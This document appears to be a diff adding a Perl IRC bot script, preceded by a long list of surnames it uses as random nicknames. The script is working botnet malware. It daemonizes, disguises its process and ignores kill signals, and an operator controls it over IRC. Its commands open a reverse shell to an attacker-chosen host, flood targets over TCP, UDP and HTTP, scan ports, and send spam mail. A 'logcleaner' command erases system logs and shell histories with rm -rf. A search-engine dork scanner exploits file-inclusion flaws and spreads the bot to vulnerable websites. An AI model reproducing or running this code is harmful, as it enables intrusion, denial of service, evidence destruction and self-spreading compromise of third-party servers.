"Mulroy","Mumford","Mussachio","Naddeo","Napolitano","Nardi","Nardone","Naviaux","Nayduch","Nelson","Nenna","Nesci","Neuman","Newfeld","Newlin", "Ng","Ni","Nickerson","Nickoloff","Nisenson","Nitabach","Notman","Nuzum","Ocougne","Ogata","Oh","O'hagan","Oldford","Olsen","Olson","Olszewski", "O'malley","Oman","O'meara","Opel","Oray","Orfield","Orsi","Ospina","Ostrowski","Ottaviani","Otten","Ouchida","Ovid","PaesDealmeida","Paine", "Palayoor","Palepu","Pallara","Palmitesta","Panadero","Panizzon","Pantilla","Paoletti","Parmeggiani","Parris","Partridge","Pascucci","Patefield", "Patrick","Pattullo","Pavetti","Pavlon","Pawloski","Paynter","Peabody","Pearlberg","Pederson","Peishel","Penny","Pereira","Perko","Perlak", "Perlman","Perna","Perone","Perrimon","Peters","Petruzello","Pettibone","Pettit","Pfister","Pilbeam","Pinot","Plancon","Plant","Plasket","Plous", "Po","Pocobene","Poincaire","Pointer","Poirier","Polak","Polanyi","Politis","Poma","Poolman","Powers","Presper","Preucel","Prevost","Pritchard", "Pritz","Proietti","Prothrow-Stith","Puccia","Pugh","Pynchon","Quaday","Quetin","Rabe","Rabkin","Radeke","Rajagopalan","Raney","Rangan","Rankin", "Rapple","Rayport","Redden-Tyler","Reedquist","Cunningham","Reinold","Remak","Renick","Repetto","Resnik","Rhea","Richmond","Rielly","Rindos", "Rineer","Rish","Rivera","Robinson","Rocha","Roesler","Rogers","Ronen","Row","Royal","Ru","Ruan","Ruderman","Ruescher","Rush","Ryu","Sabatello", "Sadler","Safire","Sahu","Sali","Samson","Sanchez-Ramirez","Sanna","Sapers","Sarin","Sartore","Sase","Satin","Satta","Satterthwaite","Sawtell", "Sayied","Scarponi","Scepan","Scharf","Scharlemann","Scheiner","Schiano","Schifini","Schilling","Schmitt","Schossberger","Schuman","Schutte", "Schuyler","Schwan","Schwickrath","Scovel","Scudder","Seaton","Seeber","Segal","Sekler","Selvage","Sen","Sennett","Seterdahl","Sexton", "Seyfert","Shaikh","Shakis","Shankland","Shanley","Shar","Shatrov","Shavelson","Shea","Sheats","Shepherd","Sheppard","Shepstone","Shesko","Shia", "Shibata","Shimon","Siesto","Sigalot","Sigini","Signa","Silverman","Silvetti","Sinsabaugh","Sirilli","Sites","Skane","Skerry","Skoda","Sloan", "Slowe","Smilow","Sniffen","Snodgrass","Socolow","Solon","Somers","Sommariva","Sorabella","Sorg","Sottak","Soukup","Soule","Soultanian","Spanier", "Sparrow","Spaulding","Speizer","Spence","Sperber","Spicer","Spiegelhalter","Spiliotis","Spinrad","StMartin","Stalvey","Stam","Stang","Stassinopolus", "States","Statlender","Stefani","Steiner","Stephanian","Stepniewska","Stewart-Oaten","Stiepock","Stillwell","Stock","Stockton","Stockwell","Stolzenberg", "Stonich","Storer","Stott","Strange","Strauch","Streiff","Stringer","Sullivan","Sumner","Suo","Surdam","Sweeting","Sweetser","Swindle","Tagiuri", "Tai", "Talaugon","Tambiah","Tandler","Tanowitz","Tatar","Taveras","Tawn","Tcherepnin","Teague","Temes","Temmer","Tenney","Terracini","Than", "Thavaneswaran","Theodos","Thibault","Thisted","Thomsen","Throop","Tierney","Till","Timmons","Tofallis","Tollestrup","Tolls","Tolman","Tomford", "Toomer","Topulos","Torresi","Torske","Towler","Toye","Traebert","Trenga","Trewin","Tringali","Troiani","Troy","Truss","Tsiatis","Tsomides","Tsukurov", "Tuck","Tudge","Tukan","Turano","Turek","Tuttle","Twells","Tzamarias","Ullman","Untermeyer","Upsdell","Urban","Urdang-Brown","Usdan","Uzuner", "Vacca","Waite","Valberg","Valencia","Wales","Wallenberg","Walter","vanAllen","VanZwet","Vandenberg","Vanheeckeren","Warshafsky","Wasowska","Vasquez", "Waugh","Weighart","Weingarten","Weinhaus","Weissbourd","Weissman","Velasquez","Welles","Welsh","Wengret","Venne","Verghese","Wescott","Wetzel", "Whately","Whilton","White","Whitla","Whittaker","Viana","Viano","Wiedersheim","Wiener","Viens","Vignola","Wilder","Wilhelm","Wilk","Wilkin","Wilkinson", "Villarreal","Willstatter","Wilson","Vitali","Viviani","Voigt","Wolk","VonHoffman","Woo","Wooden","Woods","Woods-Powell","Vorhaus","Votey","Yacono", "Yamane","Yankee","Yarchuk","Yates","Ybarra","Yedidia");
+my $nick = $nickname[rand scalar @nickname];
+#-----------------                         #
+#Nickname of bot                           #
+############################################
+my $ircname ='indolinux';
+chop (my $realname = '[indohack]');
+#-----------------                         #
+#IRC name and Realname                     #
+############################################
+$servidor='irc.ganteng.la' unless $servidor;
+my $porta='6667';
+#-----------------                         #
+#IRCServer and port                        #
+############################################
+#####################################################################
+#/!\                          .:CONFIGURATION:.                  /!\#
+#####################################################################
+######################
+#End of Configuration# 
+#                    #
+######################
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir("/");
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+
+#Connect
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Masalah fork: $!" unless defined($pid);
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+    } else {
+    print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+  my $meunick = $_[0];
+  my $servidor_con = $_[1];
+  my $porta_con = $_[2];
+  my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con",
+  PeerPort=>$porta_con) or return(1);
+  if (defined($IRC_socket)) {
+    $IRC_cur_socket = $IRC_socket;
+    $IRC_socket->autoflush(1);
+    $sel_cliente->add($IRC_socket);
+    $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+    $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+    $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+    nick("$meunick");
+    sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+    sleep 1;
+  }
+}
+
+my $line_temp;
+while( 1 ) {
+  while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+  delete($irc_servers{''}) if (defined($irc_servers{''}));
+  my @ready = $sel_cliente->can_read(0);
+  next unless(@ready);
+  foreach $fh (@ready) {
+    $IRC_cur_socket = $fh;
+    $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+    $nread = sysread($fh, $msg, 4096);
+    if ($nread == 0) {
+      $sel_cliente->remove($fh);
+      $fh->close;
+      delete($irc_servers{$fh});
+    }
+    @lines = split (/\n/, $msg);
+    for(my $c=0; $c<= $#lines; $c++) {
+
+      $line = $lines[$c];
+      $line=$line_temp.$line if ($line_temp);
+      $line_temp='';
+      $line =~ s/\r$//;
+      unless ($c == $#lines) {
+        parse("$line");
+        } else {
+        if ($#lines == 0) {
+          parse("$line");
+          } elsif ($lines[$c] =~ /\r$/) {
+          parse("$line");
+          } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+          parse("$line"); 
+          	   } else {
+          	               $line_temp = $line;
+        }
+      }
+    }
+  }
+}
+
+sub parse {
+  my $servarg = shift;
+  if ($servarg =~ /^PING \:(.*)/) {
+    sendraw("PONG :$1");
+    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+    my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
+    if ($args =~ /^\001VERSION\001$/) {
+      	 notice("$pn", "\001VERSION mIRC v6.17 ddido\001");
+    }
+    if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) {
+    if ($onde eq "$meunick"){
+    shell("$pn", "$args");
+  }
+  
+#End of Connect
+
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% 
+######################
+#      PREFIX        #
+#                    #
+######################
+# You can change the prefix if you want but the commands will be different 
+# The standard prefix is !bgr if you change it into !bitch for example 
+# every command will be like !bitch @udpflood, !bitch @googlescan.
+# So its recommended not to change this ;)
+######################
+  
+  if ($args =~ /^(\Q$meunick\E|\!hack)\s+(.*)/ ) {
+    my $natrix = $1;
+    my $arg = $2;
+    if ($arg =~ /^\!(.*)/) {
+      ircase("$pn","$onde","$1") unless ($natrix eq "!hack" and $arg =~ /^\!nick/);
+      } elsif ($arg =~ /^\@(.*)/) {
+      $ondep = $onde;
+      $ondep = $pn if $onde eq $meunick;
+      bfunc("$ondep","$1");
+      } else {
+      shell("$onde", "$arg");
+    }
+  }
+}
+}
+######################
+#   End of PREFIX    #
+#                    #
+######################
+
+elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+if (lc($1) eq lc($meunick)) {
+  $meunick=$4;
+  $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+}
+} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+nick("$meunick".int rand(999999));
+} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+$meunick = $2;
+$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+foreach my $canal (@canais) {
+  sendraw("JOIN $canal ddosit");
+}
+}
+}
+
+sub bfunc {
+my $printl = $_[0];
+my $funcarg = $_[1];
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+  exit;
+} else {
+
+######################
+#       Help         # 
+#                    #
+######################
+
+if ($funcarg =~ /^help/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) Select the function you want help for");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@ddos");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@scanscan");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@backconnect");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@shell");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@portscanner");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) Or if you want too know all the commands type:");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@commands");
+
+}
+
+if ($funcarg =~ /^ddos/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) There are 3 DDossers in this bot");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) UDPFlood, HTTPFlood and TCPFlood");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@udpflood <ip> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@tcpflood <ip> <port> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@httpflood <site> <time>");
+
+}
+
+if ($funcarg =~ /^scan/) {
+	#sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) This bot also contains a scan scanner.");
+	
+}
+
+if ($funcarg =~ /^backconnect/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) You use backconnect like this :");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@back <ip><port>");
+}
+
+if ($funcarg =~ /^shell/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) This bot has a integrated shell");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) You can use it in private but also public in the channel");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) In public channel just use : 7!bgr cd tmp12 for example");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) For help with the linux commands type :!hack 7@linuxhelp");
+}
+
+if ($funcarg =~ /^port/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) There is a normal portscan and a Nmap:");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@portscan <ip>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@nmap <ip> <beginport> <endport>");
+}
+
+if ($funcarg =~ /^commands/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) You can use the following commands :");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@portscan <ip>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@nmap <ip> <beginport> <endport>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@back <ip><port>");	
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack cd tmp 12 for example");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@udpflood <ip> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@tcpflood <ip> <port> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@httpflood <site> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@linuxhelp");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@spread <scan>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@scan <vuln> <dork>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@system");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@logcleaner");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@sendmail <subject> <sender> <recipient> <message>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@milw0rm");	
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@join #channel");	
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@part #channel");
+}
+
+if ($funcarg =~ /^linuxhelp/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Dir where you are : pwd");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Start a Perl file : perl file.pl");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Go back from dir : cd ..");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Force to Remove a file/dir : rm -rf file/dir;ls -la");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Show all files/dir with permissions : ls -lia");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Find config.inc.php files : find / -type f -name config.inc.php");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Find all writable folders and files : find / -perm -2 -ls");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Find all .htpasswd files : find / -type f -name .htpasswd");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Find all service.pwd files : find / -type f -name service.pwd");
+}
+
+######################
+#   End of  Help     # 
+#                    #
+######################
+if ($funcarg =~ /^spread\s+(.*)/) {
+$vuln = $1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Spread Mode4+) Spreading bot on :14 $vuln");
+my $shellurl="http://".$vuln.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$shellurl);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Spread Mode4+) Bot is Spreaded on :14 $vuln"); 
+}
+######################
+#     Commands       # 
+#                    #
+######################
+
+if ($funcarg =~ /^system/) {
+$uname=`uname -a`;$uptime=`uptime`;$ownd=`pwd`;$distro=`cat /etc/issue`;$id=`id`;$un=`uname -sro`;
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Info BOT : Server : 14Cannot View :14 1337");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Uname -a     : 7 $uname");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Uptime       : 7 $uptime");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Own Prosses  : 7 $processo");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) ID           : 7 $id");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Own Dir      : 7 $ownd");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) OS           : 7 $distro");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Owner        : 7 linux");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Channel      : 7 #indohackerlink");
+}
+
+if ($funcarg =~ /^bug/) {
+	my @ltt=();
+	my @bug=();
+	my $x;
+	my $page="";
+	my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
+	print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+	my @r = <$socke>;
+	$page="@r";
+	close($socke);
+	while ($page =~  m/<title>(.*)</g){
+	$x = $1;
+	if ($x =~ /\&lt\;/) {
+	$x =~ s/\&lt\;/</g;
+	}
+	if ($x !~ /milw0rm/) {
+	push (@bug,$x);
+	}}
+	while ($page =~  m/<link.*expl.*([0-9]...)</g) {
+	if ($1 !~ m/milw0rm.com|exploits|en/){
+	push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
+	}}
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Milw0rm Hack4+) Latest exploits :");
+	foreach $x (0..(@ltt - 1)) {
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Milw0rm Hack4+)14 $bug[$x] -3 $ltt[$x]");
+	sleep 1;
+}}
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+######################
+#      Portscan      # 
+#                    #
+######################
+
+if ($funcarg =~ /^port (.*)/) {
+  my $hostip="$1";
+  my
+  @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
+  my (@aberta, %porta_banner);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Portscan4+) scanning for open ports on  4".$1." started .");
+  foreach my $porta (@portas)  {
+    my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
+    'tcp', Timeout => 4);
+    if ($scansock) {
+      push (@aberta, $porta);
+      $scansock->close;
+    }
+  }
+  
+  if (@aberta) {
+    sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Portscan4+) Open ports founded:5 @aberta");
+    } else {
+    sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Portscan4+) No open ports foundend.");
+  }
+}
+
+######################
+#  End of  Portscan  # 
+#                    #
+######################
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+######################
+#        Nmap        #  
+#                    #
+######################
+   if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){
+         my $hostip="$1";
+         my $portstart = "$2";
+         my $portend = "$3";
+         my (@abertas, %porta_banner); 
+       sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Nmap4+) :4 $1 (4+Port4+) 4 $2-$3");
+       foreach my $porta ($portstart..$portend){
+               my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime); 
+    if ($scansock) {
+                 push (@abertas, $porta);
+                 $scansock->close;
+                 if ($xstats){
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Nmap4+) Founded 4 $porta"."/Open"); 
+                 }
+               }
+             }
+             if (@abertas) {
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Nmap4+) Complete ");
+             } else {
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Nmap4+) No open ports have been founded 13");
+             }
+			 }
+######################
+#    End of Nmap     #  
+#                    #
+######################
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+######################
+#    Log Cleaner     #  
+#                    #
+######################
+if ($funcarg =~ /^logcleaner/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LogCleaner4+) This process can be long, just wait"); 
+    system 'rm -rf /var/log/lastlog';
+    system 'rm -rf /var/log/wtmp';
+	system 'rm -rf /etc/wtmp';
+	system 'rm -rf /var/run/utmp';
+	system 'rm -rf /etc/utmp';
+	system 'rm -rf /var/log';
+	system 'rm -rf /var/logs';
+	system 'rm -rf /var/adm';
+	system 'rm -rf /var/apache/log';
+	system 'rm -rf /var/apache/logs';
+	system 'rm -rf /usr/local/apache/log'; 
+	system 'rm -rf /usr/local/apache/logs';
+	system 'rm -rf /root/.bash_history';
+	system 'rm -rf /root/.ksh_history';
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LogCleaner4+) All default log and bash_history files erased"); 
+		sleep 1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LogCleaner4+) Now Erasing the rest of the machine log files");
+	system 'find / -name *.bash_history -exec rm -rf {} \;';
+	system 'find / -name *.bash_logout -exec rm -rf {} \;';
+	system 'find / -name "log*" -exec rm -rf {} \;';
+	system 'find / -name *.log -exec rm -rf {} \;';
+		sleep 1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LogCleaner4+) Done! All logs erased"); 
+      }
+######################
+# End of Log Cleaner #  
+#                    #
+######################
+# 
+# cHApoenk XtReme scanner Bot
+#
+######################
+#       MAILER       #  
+#                    #
+######################
+# For mailing use :
+# !bgr @sendmail <subject> <sender> <recipient> <message>
+#
+######################
+if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Mailer4+) Sending Mail to :10 $3");
+$subject = $1;
+$sender = $2;
+$recipient = $3; 
+@corpo = $4;
+$mailtype = "content-type: text/html";
+$sendmail = '/usr/sbin/sendmail';
+open (SENDMAIL, "| $sendmail -t");
+print SENDMAIL "$mailtype\n";
+print SENDMAIL "Subject: $subject\n"; 
+print SENDMAIL "From: $sender\n";
+print SENDMAIL "To: $recipient\n\n";
+print SENDMAIL "@corpo\n\n";
+close (SENDMAIL);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Mailer4+) Mail Sended To :10 $recipient"); 
+}
+######################
+#   End of MAILER    #  
+#                    #
+######################
+######################
+#  Join And Part     # 
+#                    #
+######################
+           if ($funcarg =~ /^join (.*)/) {
+              sendraw($IRC_cur_socket, "JOIN ".$1);
+           }
+           if ($funcarg =~ /^part (.*)/) {
+              sendraw($IRC_cur_socket, "PART ".$1);
+           }
+		   
+######################
+#End of Join And Part# 
+#                    #
+######################
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+######################
+#     TCPFlood       # 
+#                    #
+######################
+
+if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+TCPKill4+) Attacking 4 ".$1.":".$2." for 4 ".$3." seconds.");
+  my $itime = time;
+  my ($cur_time);
+  $cur_time = time - $itime;
+  while ($3>$cur_time){
+  $cur_time = time - $itime;
+  &tcpflooder("$1","$2","$3");
+}
+sendraw($IRC_cur_socket,"PRIVMSG $printl :(4+TCPKill4+) Attack done 4 ".$1.":".$2.".");
+}
+######################
+#  End of TCPFlood   # 
+#                    #
+######################
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+######################
+#   Back Connect     # 
+#                    #
+######################
+if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
+my $host = "$1";
+my $porta = "$2";
+my $proto = getprotobyname('tcp');
+my $iaddr = inet_aton($host);
+my $paddr = sockaddr_in($porta, $iaddr);
+my $shell = "/bin/sh -i";
+if ($^O eq "MSWin32") {
+  $shell = "cmd.exe";
+}
+socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
+connect(SOCKET, $paddr) or die "connect: $!";
+open(STDIN, ">&SOCKET");
+open(STDOUT, ">&SOCKET");
+open(STDERR, ">&SOCKET");
+system("$shell");
+close(STDIN);
+close(STDOUT);
+close(STDERR);
+if ($estatisticas)
+{
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+BackConnect4+) Connecting to 4 $host:$porta");
+}
+}
+######################
+#End of  Back Connect# 
+#                    #
+######################
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+######################
+#    EXTREME scanNER # 
+#                    #
+######################
+######################################################################
+#################### GOOGLE
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+### Start Message
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Initializing4+) Backdoor scan is for12 $bug and12 $dork");
+### End of Start Message
+# Starting The Search Engine
+	my @google=&googlet($dork);
+#
+push(my @tot, @google);
+#
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Google4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Google4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /Mic22/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl  :4 dapet boss(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG billgate  :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /Mic22/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3busuk..sem -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### AllTheWeb
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @alltheweb=&allthewebt($dork);
+	my @allweb=&standard($dork);
+#
+push(my @tot, @alltheweb, @allweb);
+#
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+AllWeb4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
